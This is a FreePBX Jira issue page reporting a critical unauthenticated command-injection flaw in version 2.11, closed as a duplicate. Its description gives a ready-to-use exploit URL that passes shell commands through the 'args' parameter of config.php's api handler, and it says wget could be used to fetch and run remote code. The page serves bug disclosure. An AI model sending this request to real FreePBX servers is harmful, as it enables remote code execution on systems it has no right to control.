Uploaded image for project: 'FreePBX'
  1. FreePBX
  2. FREEPBX-7285

SERIOUS security flaw

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Duplicate
    • Affects Version/s: 2.11
    • Fix Version/s: None
    • Component/s: FreePBX Framework
    • Labels:
    • Environment:

      FreePBX distro

    • ToDo:
    • Distro:
      FreePBX Distro

      Description

      Try this:

      http://<YOUR FREEPBX SERVER>/admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20p0wned;echo%20really%20p0wned;

      This allow arbitrary code to be performed as part of the "args" command, including a wget and shell command to execute arbitrary downloadable code.

      Now, I realize the first thing you'll say is "block http access at the firewall," but let's say someone manages to get HTTP traffic past the firewall through a compromised account or something. This injection should not work without an authenticated session, and I consider this a VERY serious security hole.

        Gliffy Diagrams

          Attachments

            Activity

              People

              • Assignee:
                Unassigned
                Reporter:
                Bitnetix Bitnetix
              • Votes:
                0 Vote for this issue
                Watchers:
                2 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:

                  NextupJiraPlusStatus

                  Error rendering 'slack.nextup.jira:nextup-jira-plus-status'. Please contact your Jira administrators.